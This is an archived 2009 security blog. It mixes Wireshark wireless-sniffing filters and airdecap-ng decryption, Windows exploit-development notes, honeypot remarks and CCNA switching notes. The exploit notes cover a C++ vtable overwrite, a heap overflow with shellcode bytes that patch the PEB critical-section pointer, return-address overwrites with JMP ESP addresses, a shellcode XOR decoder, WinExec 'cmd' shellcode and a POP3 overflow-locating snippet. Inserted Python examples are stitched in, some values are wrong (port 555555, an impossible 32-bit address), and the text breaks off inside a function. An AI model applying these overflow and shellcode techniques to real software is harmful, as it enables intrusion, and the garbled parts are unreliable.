Wednesday, December 30, 2009

Wireless Sniffing with Wireshark

From Chapter 6 of a Syngress book:

-To display only traffic from the client station using the display field name, apply a display filter that returns only frames with our station MAC address as the source and that are not destined to the broadcast BSSID.

The display filter now becomes: eq 00:09:5b:e8:c4:03 and wlan.bssid ne ff:ff:ff:ff:ff:ff

-wlan.bssid eq 00:11:92:6e:cf:00

-We can apply a display filter to identify all packets that include the SSID “NOWIRE” as shown:
wlan_mgt.tag.interpretation eq "NOWIRE"

-wlan_mgt.tag.interpretation eq "NOWIRE" and !(wlan.bssid eq 00:02:2d:37:4f:89 or wlan.bssid eq 00:40:05:df:93:c6 or wlan.bssid eq 00:40:96:36:80:f0)

-Even when there are no stations participating on the network, an AP will transmit at least ten packets a second to advertise the presence and capabilities of the network.

We can exclude these frames by applying a display filter as shown below:
!(wlan.fc.type eq 0 and wlan.fc.subtype eq 8)
wlan.fc.type eq 0 = management frame
wlan.fc.subtype eq 8 = beacon frame
wlan.fc.type eq 2 = data frame

-wlan.fc.protected ne 1 = identify all unencrypted frames

Since management frames (beacons included) are always unencrypted, we can extend the display filter to identify unencrypted data frames only, which gives the most useful analysis:
wlan.fc.protected ne 1 and wlan.fc.type eq 2

-We can identify WEP traffic by identifying any frames that include the mandatory WEP Initialization Vector (IV):

-We can use a display filter to identify this header by filtering on the extended IV field:

-The airdecap-ng utility (included in the open-source Aircrack-ng suite of tools) can be used to rewrite a packet capture that uses the TKIP protocol. Similar to Wireshark’s ability to decrypt WEP traffic, airdecap-ng requires you to have knowledge of either the PSK or the Pairwise Master Key (PMK) in order to decrypt TKIP traffic.

-For airdecap-ng, you can decrypt a TKIP packet capture using the same technique, by specifying the TKIP PMK with the -k parameter or by specifying the PSK with the -p parameter. When decrypting TKIP traffic, you must also specify the network SSID.

-Airdecap-ng creates the output file wpapsk-dec.dump, which contains the unencrypted data frames.

airdecap-ng -l -p "dictionary" -e linksys wpask.dump

eq 00:60:1d:1f:c5:18 and wlan.fc.type eq 2

-As a security feature, modern APs using WEP only support open authentication with WEP encryption, because shared key authentication introduces additional vulnerabilities to the network.

-To get all SSIDs in the Preferred Network List:
C:\wireshark>tshark -r wireless-rwc-3.cap -nV | grep "SSID parameter set:" | sort | uniq
SSID parameter set: "hhonors"
SSID parameter set: "linksys"
SSID parameter set: "matrix"
SSID parameter set: "rogers"
SSID parameter set: "Rogers"
SSID parameter set: "turbonet"
SSID parameter set: "wldurel"
SSID parameter set: Broadcast

-A display filter to examine only traffic sent to the DS from wireless stations:
wlan.fc.tods eq 1 and wlan.fc.fromds eq 0

wlan.fc.tods eq 1 and wlan.fc.fromds eq 0 and eq 00:13:ce:55:98:ef and arp.opcode eq 1

-From the main Wireshark window, we can use the display filter function to display only malformed frames with the following filter:

-Frames that should only be transmitted by an AP (beacons, reassociation response, probe response)

-Frames that should only be transmitted by stations (probe request, reassociation request, association request).

Fuzzing suspicion
e.g. individual frames include values that are not reasonable: frame 278 indicates the beacon interval is 42,281 milliseconds (msec) (BI=42281), which means the AP is transmitting beacons once every 43.3 seconds, as opposed to the standard convention of 10 times per second. Similarly, frame 472 reports a beacon interval of 18,146, or one beacon every 18.1 seconds.
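As an added example (not from the book or the original post), the Python below decodes the 802.11 header fields that the wlan.fc.*, wlan.sa and wlan.bssid filters above operate on, applies the same filter logic to a few constructed frames, and flags the out-of-range beacon interval described under the fuzzing note. The frame bytes, SSID and the 42281 interval are constructed sample data; the MAC addresses are the ones quoted in the filters above.

```python
import struct

BEACON = (0, 8)     # wlan.fc.type eq 0 and wlan.fc.subtype eq 8
TU_MS = 1.024       # a beacon interval "time unit" is 1.024 ms; 100 TU ~ 10 beacons/s

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_ssid_tag(tags: bytes):
    """Walk the tagged parameters of a management frame body and return the SSID (tag 0)."""
    i = 0
    while i + 2 <= len(tags):
        tag_id, length = tags[i], tags[i + 1]
        value = tags[i + 2:i + 2 + length]
        if tag_id == 0:
            return value.decode("utf-8", "replace") if length else "Broadcast"
        i += 2 + length
    return None

def parse_80211(frame: bytes) -> dict:
    """Decode the header fields behind Wireshark's wlan.fc.*, wlan.sa and wlan.bssid."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype, flags = (fc >> 2) & 0x3, (fc >> 4) & 0xF, fc >> 8
    to_ds, from_ds, protected = bool(flags & 0x01), bool(flags & 0x02), bool(flags & 0x40)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    # Which address field carries the SA and the BSSID depends on the To DS / From DS bits.
    if to_ds and from_ds:
        sa, bssid = frame[24:30], None          # WDS frame: SA is addr4, there is no BSSID
    elif to_ds:
        sa, bssid = a2, a1
    elif from_ds:
        sa, bssid = a3, a2
    else:
        sa, bssid = a2, a3
    info = {"type": ftype, "subtype": subtype, "to_ds": to_ds, "from_ds": from_ds,
            "protected": protected, "sa": mac_str(sa),
            "bssid": mac_str(bssid) if bssid else None}
    if (ftype, subtype) == BEACON:
        body = frame[24:]                       # timestamp(8) | interval(2) | capability(2) | tags
        info["beacon_interval_tu"] = struct.unpack_from("<H", body, 8)[0]
        info["ssid"] = parse_ssid_tag(body[12:])
    return info

# The display filters from the notes above, as predicates over a parsed frame.
def not_beacon(f):            # !(wlan.fc.type eq 0 and wlan.fc.subtype eq 8)
    return (f["type"], f["subtype"]) != BEACON

def unencrypted_data(f):      # wlan.fc.protected ne 1 and wlan.fc.type eq 2
    return not f["protected"] and f["type"] == 2

def station_to_ds(f):         # wlan.fc.tods eq 1 and wlan.fc.fromds eq 0
    return f["to_ds"] and not f["from_ds"]

def beacon_interval_seconds(tu: int) -> float:
    return round(tu * TU_MS / 1000, 1)          # 42281 TU -> 43.3 s

def suspicious_beacon(f, max_seconds: float = 1.0) -> bool:
    """Flag beacons far from the usual ~10/s; odd values hint at fuzzing or a misbehaving AP."""
    tu = f.get("beacon_interval_tu")
    return tu is not None and (tu == 0 or beacon_interval_seconds(tu) > max_seconds)

# --- constructed sample frames (not taken from a real capture) ---
def build_header(ftype, subtype, flags, a1, a2, a3):
    fc = (ftype << 2) | (subtype << 4) | (flags << 8)
    return struct.pack("<HH", fc, 0) + a1 + a2 + a3 + struct.pack("<H", 0)

def build_beacon(bssid, ssid, interval_tu):
    body = struct.pack("<QHH", 0, interval_tu, 0x0401) + bytes([0, len(ssid)]) + ssid.encode()
    return build_header(0, 8, 0, b"\xff" * 6, bssid, bssid) + body

AP = bytes.fromhex("0011926ecf00")    # BSSID from the wlan.bssid filter above
STA = bytes.fromhex("00095be8c403")   # station MAC address used in the notes above
SAMPLE_FRAMES = [
    build_beacon(AP, "NOWIRE", 100),                               # normal: 10 beacons/s
    build_beacon(AP, "NOWIRE", 42281),                             # the BI=42281 case (43.3 s)
    build_header(2, 0, 0x01 | 0x40, AP, STA, b"\xff" * 6),         # protected data, station -> DS
    build_header(2, 0, 0x01, AP, STA, b"\xff" * 6) + b"\x00" * 8,  # unprotected data, station -> DS
]

def summarize(frames):
    parsed = [parse_80211(f) for f in frames]
    return {
        "non_beacon": sum(not_beacon(p) for p in parsed),
        "unencrypted_data": sum(unencrypted_data(p) for p in parsed),
        "station_to_ds": sum(station_to_ds(p) for p in parsed),
        "suspicious_beacon_tu": [p["beacon_interval_tu"] for p in parsed if suspicious_beacon(p)],
        "ssids": sorted({p["ssid"] for p in parsed if p.get("ssid")}),
    }

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_FRAMES).items():
        print(f"{key}: {value}")
```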

Tuesday, December 29, 2009

Socket programming RCE

My sample of a simple socket program which connects to port 555555:

#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")   // link against Winsock 2

int main(void) {
    // Initialize Winsock
    WSADATA wsaData;
    int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != NO_ERROR) {
        printf("Error at WSAStartup()\n");
        return 1;
    }

    // Create a SOCKET for connecting to server
    SOCKET ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (ConnectSocket == INVALID_SOCKET) {
        printf("Error at socket(): %ld\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }

    // The sockaddr_in structure specifies the address family,
    // IP address, and port of the server to be connected to.
    struct sockaddr_in clientService;
    clientService.sin_family = AF_INET;
    clientService.sin_addr.s_addr = inet_addr( "" );   // server IP left blank in the original
    clientService.sin_port = htons( 55555 );           // port in network byte order

    // Connect to server.
    if ( connect( ConnectSocket, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR) {
        printf( "Failed to connect.\n" );
        closesocket(ConnectSocket);
        WSACleanup();
        return 1;
    }

    printf("Connected to server.\n");

    closesocket(ConnectSocket);
    WSACleanup();
    return 0;
}

I debugged the executable file in OllyDbg and monitored the connection with netcat. Connected! The IP and port number can be seen clearly in OllyDbg. During the process, one hardware breakpoint needs to be set. If I set a normal software breakpoint, the program won't stop.

Monday, December 28, 2009

ntoh and hton

In socket programming, 'htons' and 'ntohs' are usually used to convert the byte order of the IP port. This ensures that the integer is represented correctly regardless of the endianness of the machine.

On some machines, such as IBM machines, they basically do nothing. On others, e.g. Intel, they rearrange (swap) all the bytes.

Little-endian architecture (eg,Intel) ==> swap bytes
Big-endian architecture (eg, IBM, Motorola) ==> output is same as input

htons() // host to network short: converts a short from host byte order to network byte order

htonl() // host to network long

ntohs() // network to host short

ntohl() // network to host long

We use 'hton' when we're about to send data over the wire, and 'ntoh' to convert the data from the wire into a form we can use. The byte order that travels on the wire is "Network Byte Order", which is big endian.
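As an added illustration (not from the original post), this Python reimplements the four conversions with an explicit byte swap, cross-checks them against the C library's versions, and lays out the sockaddr_in from the Winsock sample to show which fields travel in network order. The 10.0.0.1 address is a made-up sample value.

```python
import socket
import struct
import sys

HOST_IS_LITTLE_ENDIAN = sys.byteorder == "little"   # True on Intel/x86, False on big-endian hosts

def swap16(x: int) -> int:
    """Reverse the two bytes of a 16-bit value: 0x1234 -> 0x3412."""
    return ((x & 0x00FF) << 8) | ((x & 0xFF00) >> 8)

def swap32(x: int) -> int:
    """Reverse the four bytes of a 32-bit value: 0x12345678 -> 0x78563412."""
    return (((x & 0x000000FF) << 24) | ((x & 0x0000FF00) << 8) |
            ((x & 0x00FF0000) >> 8) | ((x & 0xFF000000) >> 24))

# Host-to-network: swap on little-endian hosts, pass the value through on big-endian ones.
def htons(x: int) -> int:
    return swap16(x) if HOST_IS_LITTLE_ENDIAN else x

def htonl(x: int) -> int:
    return swap32(x) if HOST_IS_LITTLE_ENDIAN else x

# Network-to-host is the same operation: a byte swap is its own inverse.
ntohs, ntohl = htons, htonl

def port_on_wire(port: int) -> bytes:
    """The two bytes a port occupies on the wire. Network byte order is big endian,
    so 55555 (0xD903) travels as d9 03 whatever the sending host's endianness."""
    return struct.pack(">H", port)

def encode_sockaddr_in(ip: str, port: int) -> bytes:
    """Lay out a 16-byte sockaddr_in the way the Winsock sample above fills it:
    sin_family stays in host order, while sin_port and sin_addr are in network order."""
    family = struct.pack("=H", socket.AF_INET)   # "=": native byte order, standard size
    return family + port_on_wire(port) + socket.inet_aton(ip) + b"\x00" * 8

def decode_sockaddr_in(raw: bytes):
    """Inverse of encode_sockaddr_in: ntohs for the port, inet_ntoa for the address."""
    family = struct.unpack("=H", raw[0:2])[0]
    port = struct.unpack(">H", raw[2:4])[0]
    return family, socket.inet_ntoa(raw[4:8]), port

def matches_stdlib(port: int = 55555, addr: int = 0x0A000001) -> bool:
    """Cross-check the hand-written conversions against the C library's versions."""
    return htons(port) == socket.htons(port) and htonl(addr) == socket.htonl(addr)

if __name__ == "__main__":
    print("host byte order:", sys.byteorder)
    print("htons(55555) =", hex(htons(55555)), "-> on the wire:", port_on_wire(55555).hex())
    print("sockaddr_in for 10.0.0.1:55555 =", encode_sockaddr_in("10.0.0.1", 55555).hex())
```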

Exploiting C++ virtual function

Object | Vtable
Vtable pointer -----> Virtual function_1---> Virtual function1()

#include <iostream>
#include <cstring>
using namespace std;
extern char shellcode[];   // the payload, defined elsewhere in the test program

class Failwest {
public:
    char buf[200];
    virtual void test(void) { cout << "Class Vtable::test()" << endl; }
};

Failwest overflow, *p;

int main(void) {
    char *p_vtable;
    p_vtable = overflow.buf - 4;      // point to the virtual table pointer (just before buf)
    strcpy(overflow.buf, shellcode);  // the copy runs past buf and overwrites the vtable pointer
    p = &overflow;
    p->test();                        // the call goes through the overwritten vtable
    return 0;
}

Layout of the object

vtable pointer
fake virtual function pointer

Flow : vtable pointer ---> fake virtual function pointer ----> shellcode

Saturday, December 26, 2009

Heap Overflow

For Visual C++, use the release version to test the code.

To prevent the application from detecting the debugger and using the debug heap management policy, add an '_asm int 3' after the heap is initialised. The application will stop after the heap is created. Now attach the process to the debugger to test.

To study the heap:
1. The heap_vis plugin for OllyDbg can be used to inspect the heap.
2. Go directly to the heap location with Ctrl + G.


To overflow the heap, set flink to 0x44444444 and blink to 0x00000000. When the next allocation routine runs, an exception is raised because 0x44444444 cannot be written to 0x00000000. If we change the target to a legitimate address, 0x44444444 will be written to that target.

When the application exits, ExitProcess() will execute. It triggers RtlEnterCriticalSection() and RtlLeaveCriticalSection() to synchronise threads.

RtlEnterCriticalSection() ---> 0x7FFDF020
RtlLeaveCriticalSection() ---> 0x7FFDF024

To prevent an error, we need to repair the pointers to Rtl...() (in the PEB).
0x7FFDF020 usually holds a pointer to 0x77F8AA4C

Example of the shellcode

char shellcode[] =
    // repair the pointer that was overwritten by the heap overrun
    "\xB8\x20\xF0\xFD\x7F"     // MOV EAX, 7FFDF020
    "\xBB\x4C\xAA\xF8\x77"     // MOV EBX, 77F8AA4C (this address must be verified on each OS version)
    "\x89\x18"                 // MOV DWORD PTR DS:[EAX], EBX
    // ... the payload goes here ...
    "\x16\x01\x1A\x00\x00\x00\x00\x00"   // header of the adjacent free block
    "\x88\x06\x52\x00\x20\xF0\xFD\x7F";  // 0x00520688 is the address of the shellcode in the heap block,
                                         // 0x7FFDF020 is the address of the RtlEnterCriticalSection() pointer

Attention:
1. For a heap overflow, we usually need to repair the heap environment.
2. Testing in debug and release mode differs. The solution is the _asm int 3.
3. To correctly verify the shellcode address, David Litchfield suggested using these as the jump command. They can be found in netapi32.dll, user32.dll, rpcrt4.dll


Thursday, December 24, 2009

PE File Format

- VA = Image Base + RVA

Relation of File Offset and RVA

Section   RVA          File Offset
.text     0x00001000   0x0400
.rdata    0x00007000   0x6200
.data     0x00009000   0x7400
.rsrc     0x0002D000   0x7800

.text section offset = 0x1000-0x400 = 0xc00
.rdata section offset = 0x7000-0x6200 = 0xE00
.data section offset = 0x9000-0x7400 = 0x1c00
.rsrc section offset = 0x2D000-0x7800 = 0x25800

File offset = VA - Imagebase - section offset
= RVA - section offset
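Added example (not from the original post or from LordPE): parsing IMAGE_SECTION_HEADER entries and converting RVAs and VAs to file offsets with the table above. The section sizes, characteristics and the ImageBase of 0x00400000 are assumptions chosen to keep the sections contiguous; the RVA / file-offset pairs are the ones from the table.

```python
import struct

SECTION_HEADER = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER layout, 40 bytes
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER)

def parse_section_table(blob: bytes, count: int):
    """Parse `count` IMAGE_SECTION_HEADER entries as they appear after the optional header."""
    sections = []
    for i in range(count):
        (name, vsize, va, rawsize, rawptr, _reloc, _lines, _nreloc, _nlines,
         chars) = struct.unpack_from(SECTION_HEADER, blob, i * SECTION_HEADER_SIZE)
        sections.append({"name": name.rstrip(b"\x00").decode(), "VirtualAddress": va,
                         "VirtualSize": vsize, "PointerToRawData": rawptr,
                         "SizeOfRawData": rawsize, "Characteristics": chars})
    return sections

def section_delta(sec) -> int:
    """The 'section offset' of the notes: RVA of the section start minus its file offset."""
    return sec["VirtualAddress"] - sec["PointerToRawData"]

def rva_to_file_offset(rva: int, sections):
    """RVA -> file offset. Returns None for RVAs that exist only in memory, e.g. the
    zero-filled tail of .data beyond SizeOfRawData, or addresses outside every section."""
    for sec in sections:
        start = sec["VirtualAddress"]
        span = max(sec["VirtualSize"], sec["SizeOfRawData"])
        if start <= rva < start + span:
            delta = rva - start
            if delta >= sec["SizeOfRawData"]:
                return None                    # mapped, but not backed by file bytes
            return sec["PointerToRawData"] + delta
    if sections and rva < sections[0]["VirtualAddress"]:
        return rva                             # the headers are mapped 1:1 from file start
    return None

def va_to_file_offset(va: int, image_base: int, sections):
    """File offset = VA - ImageBase - section offset, i.e. RVA - section offset."""
    return rva_to_file_offset(va - image_base, sections)

def build_section_header(name: bytes, vsize, va, rawsize, rawptr, chars) -> bytes:
    return struct.pack(SECTION_HEADER, name.ljust(8, b"\x00"), vsize, va, rawsize, rawptr,
                       0, 0, 0, 0, chars)

IMAGE_BASE = 0x00400000                        # assumed ImageBase, typical for an EXE
# Constructed section table: RVAs and raw pointers from the table above; the sizes and
# the characteristics (CODE|EXECUTE|READ, DATA|READ, DATA|READ|WRITE) are assumptions.
SAMPLE_TABLE = b"".join([
    build_section_header(b".text",  0x5E00,  0x1000,  0x5E00, 0x0400, 0x60000020),
    build_section_header(b".rdata", 0x1200,  0x7000,  0x1200, 0x6200, 0x40000040),
    build_section_header(b".data",  0x23000, 0x9000,  0x0400, 0x7400, 0xC0000040),
    build_section_header(b".rsrc",  0x0400,  0x2D000, 0x0400, 0x7800, 0x40000040),
])
SAMPLE_SECTIONS = parse_section_table(SAMPLE_TABLE, 4)

def deltas(sections) -> dict:
    return {s["name"]: section_delta(s) for s in sections}

if __name__ == "__main__":
    for name, d in deltas(SAMPLE_SECTIONS).items():
        print(f"{name:<7} section offset = {d:#x}")
    print("VA 0x00401234 -> file offset", hex(va_to_file_offset(0x00401234, IMAGE_BASE, SAMPLE_SECTIONS)))
    print("RVA 0xA000 (uninitialised .data) ->", rva_to_file_offset(0xA000, SAMPLE_SECTIONS))
```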

LordPE is a nice tool for PE analysis

Hex Editor : Ultra Edit, Hex Workshop, WinHex

Wednesday, December 23, 2009

Stack Overflow 2

For Visual C++ :

-For the stack overflow experiment, we should use the debug version. If we use the release version, we may need to retest.

-For heap overflow, we should use the release version. If we use the debug version, it will fail. If the heap test is run directly under OllyDbg or WinDbg, the heap manager will use the debug management policy.

ESP - pointing to the top of the stack
EBP - pointing to the base of the current stack frame

_stdcall and _cdecl will be different. By default, Visual C++ will use _stdcall.

call function
push ebp
mov ebp, esp
sub esp, xxx

add esp, xxx
pop ebp

Stack layout

char buffer[0-3]    low addr
char buffer[4-7]
return address      high addr

Example: the input is 43214321432143214321

The memory layout in OllyDbg:

char buffer[0-3]    1234   (offset 3,2,1,0)
char buffer[4-7]    1234
int ...             1234
ebp                 1234
return address      1234

If the modified return address is 0x00401122, we should input it as 22 11 40 00 (for little endian), so that the resulting EIP shows 0x00401122 correctly.

In Visual Studio 6.0, "Dependency Walker" can be used to obtain the user32.dll base address, the MessageBoxA entry point offset, etc.

To obtain all the various jump addresses in the process, the OllyDbg plugin "OllyUni.dll" can be used. Put it in the Plugins folder of the OllyDbg directory and restart Olly.

Right click on the code --> Overflow Return Address --> ASCII Overflow returns --> Search JMP/CALL ESP --> click the L button on the Olly toolbar (or Log)

- If the path length differs (so the addresses are not fixed), the heap spray method is useful for this situation.

- The decoder for shellcode

ADD EAX,14h   //the length of the decoder is 20 bytes
XOR BL,44h    //the encoding key is 0x44
CMP BL,90h    //stop when the 0x90 terminator is reached

At the start of the decoder, EAX points to the start of the shellcode. The decoder is followed by the real (encoded) shellcode. For this decoder, we need to append a 0x90 byte as the shellcode terminator.

Tips for making the shellcode "thinner"

- Some super useful asm instructions for the shortest shellcode:

xchg eax, reg   //exchange eax with the register value
lodsd           //the dword pointed to by esi is loaded into eax, then esi is incremented
lodsb           //the byte pointed to by esi is loaded into al, then esi is incremented
cdq             //sign-extends eax into edx; if eax < 0x80000000, this instruction can replace
                //mov edx, 0 (NULL)

- use registers such as EBP, ESI, EDI, etc. to store data instead of pushing it onto the stack
- the code can be used as data
- protect the stack by raising the esp value first; this saves a lot of data-initialising instructions

Wednesday, December 16, 2009

Stack and Integer Overflow

Stack Overflow

-Common addresses for XP, 2000 and 2003: JMP EBX address = 0x7ffa1571 0x7ffa4a1, JMP ESP = 0x7ffa4512

- Sometimes, after jmp esp, the shellcode cannot follow directly, e.g. in the MS03-049 Workstation Service overflow and the MS03-026 RPC overflow. Sometimes a gap is needed there, maybe 8 bytes, so when testing it should be

jmp esp ---> testing code ( eg, eb fe ) ---> shellcode

Solution:
1. Place the shellcode in front of the return address
2. Add some junk code in the gap

- To check whether a host is running the vulnerable application, we may scan it by analysing the network packets. Usually the patched version will differ from the unpatched version.

- To locate the overflow point, here is the Python code (for CMail):

import poplib
m = poplib.POP3('')   # POP3 server address left blank in the original
s = 'a' * 100 + 'b' * 100 + 'c' * 100 + 'd' * 100 + 'e' * 100

import poplib
m = poplib.POP3('')   # POP3 server address left blank in the original
s = 'a' * 400 + 'a' * 10 + 'b' * 10 + 'c' * 10 + 'd' * 10 + 'e' * 10 + 'f' * 10 + 'g' * 10 + 'h' * 10 + 'i' * 10 + 'j' * 10

- To open a command prompt

push ebp
mov ebp, esp
push ebx
mov byte ptr [ebp-4], 63h   //'c'
mov byte ptr [ebp-3], 6Dh   //'m'
mov byte ptr [ebp-2], 64h   //'d'
mov byte ptr [ebp-1], 0     //'\0'

push 5                      //SW_SHOW = 5
lea eax, [ebp-4]
push eax                    //pointer to "cmd"
mov eax,0x777e4fd35         //address of WinExec; must be verified for the target OS
call eax
pop esp

#include <windows.h>

int main(void) {
    char cmdline[4] = "cmd";
    WinExec(cmdline, SW_SHOW);
    return 0;
}

Integer Overflow

- The input could be a negative value. When this input is assigned to an unsigned variable, -1 becomes 0xffffffff. This could trigger an overflow by causing a huge heap area to be allocated.

- Usually this type of overflow is harder to use than the usual stack or heap overflow.

- Examples: JPEG integer overflow, Windows USER32 LoadImage API integer overflow, PuTTY SFTP client integer overflow, Evolution camel-lock-helper integer overflow

Thursday, December 3, 2009


For file signature verification, I noticed a tool in Windows that is installed by default on several Win32 platforms, namely sigverif. To execute the tool, type 'sigverif' in the Run box.

Sigverif is able to scan the system folder to find unsigned system files or driver files. The scanning path can be defined by ourselves, e.g. SYSTEM/Driver, etc.

Yet the tool is only able to inform us about the unsigned files; it cannot do anything else, e.g. export the result to CSV or further investigate the file details.

Here is the scanning result of my Windows VM:

Monday, November 30, 2009

Dionaea - Nepenthes successor

Nepenthes, the low-interaction honeypot, has been deployed in the wild for several years. It is a versatile tool to collect malware; it acts passively by emulating known vulnerabilities and downloading the malware that tries to exploit these vulnerabilities.

Here comes the next generation of low-interaction honeypot, Dionaea, which is funded by Google Summer of Code 2009. It introduces several nice features to improve on the Nepenthes functionality:

- embedding python as scripting language
- using libemu to detect shellcodes
- supporting ipv6 and tls

Full details about Dionaea can be found here.

And one interesting thing that I just found out from the Nepenthesdev mailing list: Hugo González from the Mexican Chapter of the Honeynet created VirtualBox Debian images which make it easier to install dionaea.

The image can be downloaded and imported into VirtualBox.

Monday, November 9, 2009

CCNA3 Chap 4-7 Note

Chapter 4 VTP

The switch can be configured in the role of a VTP server or a VTP client. VTP only learns about normal-range VLANs (VLAN IDs 1 to 1005). Extended-range VLANs (IDs greater than 1005) are not supported by VTP.

VTP stores VLAN configurations in the VLAN database called vlan.dat.

A router or Layer 3 switch defines the boundary of each domain.

VTP Modes- A switch can be configured in one of three modes: server, client, or transparent.

VTP clients function the same way as VTP servers, but you cannot create, change, or delete VLANs on a VTP client.

VTP Transparent-Transparent switches forward VTP advertisements to VTP clients and VTP servers. Transparent switches do not participate in VTP. VLANs that are created, renamed, or deleted on transparent switches are local to that switch only.

VTP Pruning-VTP pruning increases network available bandwidth by restricting flooded traffic to those trunk links that the traffic must use to reach the destination devices. Without VTP pruning, a switch floods broadcast, multicast, and unknown unicast traffic across all trunk links within a VTP domain even though receiving switches might discard them.

VTP server mode is the default mode for a Cisco switch.

A switch can be a member of only one VTP domain at a time. Until the VTP domain name is specified you cannot create or modify VLANs on a VTP server, and VLAN information is not propagated over the network.

A VTP frame is encapsulated as an 802.1Q frame.

Each time a VLAN is added or removed, the configuration revision number is incremented.

Note: A VTP domain name change does not increment the revision number. Instead, it resets the revision number to zero.

Summary advertisements are sent:

-Every 5 minutes by a VTP server or client to inform neighboring VTP-enabled switches of the current VTP configuration revision number for its VTP domain
-Immediately after a configuration change has been made

Request Advertisements

When a request advertisement is sent to a VTP server in the same VTP domain, the VTP server responds by sending a summary advertisement and then a subset advertisement.

Request advertisements are sent if:

-The VTP domain name has been changed
-The switch receives a summary advertisement with a higher configuration revision number than its own
-A subset advertisement message is missed for some reason
-The switch has been reset

Summary advertisements comprise the majority of VTP advertisement traffic.

You need to enable pruning on only one VTP server switch in the domain.

VTP server: Confirm that all of the switches you are going to configure have been set to their default settings.

As on the VTP server switch, confirm that the default settings are present.

Configure VTP client mode. Recall that the switch is not in VTP client mode by default. You have to configure this mode.


Chap 5 STP

Redundancy is the solution for achieving the necessary availability.

For a broadcast frame, if there is more than one path for the frame to be forwarded out, it can result in an endless loop.

Network loops that are a result of accidental duplicate connections in the wiring closets are a common occurrence.

STP ensures that there is only one logical path between all destinations on the network by intentionally blocking redundant paths that could cause a loop.

If the path is ever needed to compensate for a network cable or switch failure, STP recalculates the paths and unblocks the necessary ports to allow the redundant path to become active.

The switch with the lowest BID automatically becomes the root bridge for the STA calculations.

The BID is made up of a priority value, an extended system ID, and the MAC address of the switch.

After a switch boots, it sends out BPDU frames containing the switch BID and the root ID every 2 seconds.

The root ID identifies the root bridge on the network. Initially, each switch identifies itself as the root bridge after bootup.

Although switch ports have a default port cost associated with them, the port cost is configurable.

spanning-tree cost value
spanning-tree cost 25

no spanning-tree cost //revert back

STP determines a root bridge for the spanning-tree instance by exchanging BPDUs.

This frame has a destination MAC address of 01:80:C2:00:00:00, which is a multicast address for the spanning-tree group.

When a switch first boots, the root ID is the same as the bridge ID. However, as the election process occurs, the lowest bridge ID replaces the local root ID to identify the root bridge switch.

During the BPDU process, the root ID will change, but the bridge ID won't change.

The default value for the priority of all Cisco switches is 32768. The priority range is between 1 and 65536; therefore, 1 is the highest priority.

When two switches are configured with the same priority and have the same extended system ID, the switch with the MAC address with the lowest hexadecimal value has the lower BID. Initially, all switches are configured with the same default priority value. The MAC address is then the deciding factor on which switch is going to become the root bridge.

The root port exists on non-root bridges and is the switch port with the best path to the root bridge. Root ports forward traffic toward the root bridge.

Only one root port is allowed per bridge.

For root bridges, all switch ports are designated ports. For non-root bridges, a designated port is the switch port that receives and forwards frames toward the root bridge as needed.

spanning-tree port-priority value

The port priority values range from 0 - 240, in increments of 16. The default port priority value is 128. As with bridge priority, lower port priority values give the port higher priority.

When two switches are connected to the same LAN segment, and root ports have already been defined, the two switches have to decide which port gets to be configured as a designated port and which one is left as the non-designated port

The switch with the lower BID has its port configured as a designated port, while the switch with the higher BID has its port configured as a non-designated port.

The port ID is appended to the port priority. For example, switch port F0/1 has a default port priority value of 128.1, where 128 is the configurable port priority value, and .1 is the port ID. Switch port F0/2 has a port priority value of 128.2, by default.

During a topology change, a port temporarily implements the listening and learning states for a specified period called the "forward delay interval."

Switch diameter is the number of switches a frame has to traverse to travel between the two farthest points on the broadcast domain. A seven-switch diameter is the largest diameter that STP permits because of convergence times.

When a switch port configured with PortFast is configured as an access port, that port transitions from blocking to forwarding state immediately, bypassing the typical STP listening and learning states.

To understand the convergence process more thoroughly, it has been broken down into three distinct steps:

Step 1. Elect a root bridge

Step 2. Elect root ports

Step 3. Elect designated and non-designated ports

The show spanning-tree output for switch S1 reveals that it is the root bridge. You can see that the BID matches the root ID, confirming that S1 is the root bridge.

The max age delay of 20 seconds provides enough time for the seven-switch diameter with the 2-second hello timer between BPDU frame transmissions.

When a switch needs to signal a topology change, it starts to send TCNs on its root port. The TCN is a very simple BPDU that contains no information and is sent out at the hello time interval.

The receiving switch is called the designated bridge and it acknowledges the TCN by immediately sending back a normal BPDU with the topology change acknowledgement (TCA) bit set.

With PVST+, a network can run an STP instance for each VLAN in the network. With PVST+, more than one trunk can block for a VLAN and load sharing can be implemented.

However, you can set the switch priority for the specified spanning-tree instance. This setting affects the likelihood that this switch is selected as the root switch. A lower value increases the probability that the switch is selected. The range is 0 to 61440 in increments of 4096. For example, a valid priority value is 4096x2 = 8192. All other values are rejected.
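Added example (not from the CCNA material): a Python model of the BID comparison, the root election and the designated-port decision described above, including the priority increments of 4096 and 16 that the switch accepts. The switch names and MAC addresses are made up, and root path costs are assumed equal on the sample segment.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Switch:
    name: str
    mac: str                  # e.g. "00:1b:0c:00:00:01"
    priority: int = 32768     # Cisco default bridge priority

def is_valid_bridge_priority(priority: int) -> bool:
    """Bridge priority must be 0..61440 in increments of 4096 (e.g. 4096*2 = 8192)."""
    return 0 <= priority <= 61440 and priority % 4096 == 0

def is_valid_port_priority(priority: int) -> bool:
    """Port priority must be 0..240 in increments of 16 (default 128)."""
    return 0 <= priority <= 240 and priority % 16 == 0

def bridge_id(sw: Switch, vlan: int) -> int:
    """64-bit BID = 4-bit priority | 12-bit extended system ID (the VLAN) | 48-bit MAC.
    The priority sits in the high bits, so it is compared first; the MAC only decides
    when the priorities (and VLAN) are equal."""
    if not is_valid_bridge_priority(sw.priority):
        raise ValueError(f"{sw.name}: bad bridge priority {sw.priority}")
    mac_int = int(sw.mac.replace(":", "").replace("-", ""), 16)
    return ((sw.priority + vlan) << 48) | mac_int

def elect_root(switches, vlan: int = 1) -> Switch:
    """Step 1 of convergence: the switch with the lowest BID becomes the root bridge."""
    return min(switches, key=lambda sw: bridge_id(sw, vlan))

def port_id(port_priority: int, port_number: int):
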